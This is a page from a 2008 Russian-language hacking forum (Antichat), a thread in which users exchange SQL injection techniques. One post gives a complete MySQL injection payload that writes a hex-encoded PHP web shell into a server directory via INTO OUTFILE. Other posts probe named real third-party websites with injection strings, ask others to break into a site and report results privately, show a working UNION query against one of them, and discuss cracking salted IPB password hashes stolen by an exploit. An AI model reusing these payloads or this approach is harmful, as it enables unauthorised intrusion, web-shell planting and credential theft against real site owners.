Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
15.11.2008, 21:09
|
|
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782
Репутация:
81
|
|
2 jokester&l1ght
Спаcибо огромное)
а как узнал о существовании tblnews ???
|
|
|
15.11.2008, 21:11
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678
Репутация:
354
|
|
попугай
script.php?id=-1+union+select+1,2,3,4,5,0x3c3f2073797374656d28245 f4745545b27636d64275d293b203f3e,7,8,9,10+from+tabl e_name+into+outfile+'/var/www/html/tmp/shell_name.php'/*
Где /var/www/html/tmp/ -путь к директории, доступной на запись (ковыряй, ищи), table_name имя любой таблицы,shell_name.php имя шелла (главное, чтоб в этой директории не было такого же =) ), а 0x3c3f2073797374656d28245f4745545b27636d64275d293b 203f3e -это захексенное '<?system($_GET[cmd]);?>', главное, чтобы кавычки прокатывали.
UPD
Не успел, ответили раньше =)
|
|
|
|
15.11.2008, 21:48
|
|
Новичок
Регистрация: 07.10.2007
Сообщений: 4
Провел на форуме:
32389
Репутация:
1
|
|
l1ght
А если вручную? Какая последовательность действий для инъекции в Interbase?
SQL Инъеция после WHERE
SELECT * WHERE ID=[SQL INJ]
|
|
|
|
16.11.2008, 12:03
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
почему когда я отправляю запрос
www.grog-ink.com/detail.asp?ID=1 or 1=@@version--
мне выводит:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'Product_ID = 1 or 1=@@version-- AND Product_Vis = 1'.
/detail.asp, line
А не нужные мне параметры? Запрос по сути верный.. |
|
|
|
16.11.2008, 12:24
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Ershik
Ты путаешь с MSSQL , а это Access, там немного другой синтаксис, и твой запрос не верен
|
|
|
|
16.11.2008, 19:16
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678
Репутация:
354
|
|
Ershik
тебе сюда:
https://forum.antichat.ru/thread50550-Microsoft+Access.html
|
|
|
|
16.11.2008, 20:55
|
|
Новичок
Регистрация: 03.11.2008
Сообщений: 11
Провел на форуме:
98865
Репутация:
1
|
|
Есть сплоит Invision Power Board v2.1 <= 2.1.6 sql injection exploit by RST/GHC
Так вот, он ворует хеш, но на сколько мне известно в Invision Power Board 2.x.x алгоритм такой:
md5(md5($salt).md5($pass))
Значит нужна соль, сплоит её не ворует, где же её взять? |
|
|
|
16.11.2008, 21:13
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
Еще вопрс, что означает эта уязвимость? Как ей можно воспользоваться?
http://www.campustore.it/ita/viewpage.aspx?ID=431'
|
|
|
|
16.11.2008, 22:12
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838
Репутация:
770
|
|
час ночи и мозг отказывается работать. раскрутит кто? с результатами желательно в пм (-
http://www.zahar.de/bigmir/forum/showprofil.php?id=1'
|
|
|
|
17.11.2008, 00:20
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Calcutta
http://www.zahar.de/bigmir/forum/showprofil.php?id=999+union+select+version()+limit +1,1
4 ветка... дальше с выводом проблемы )
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
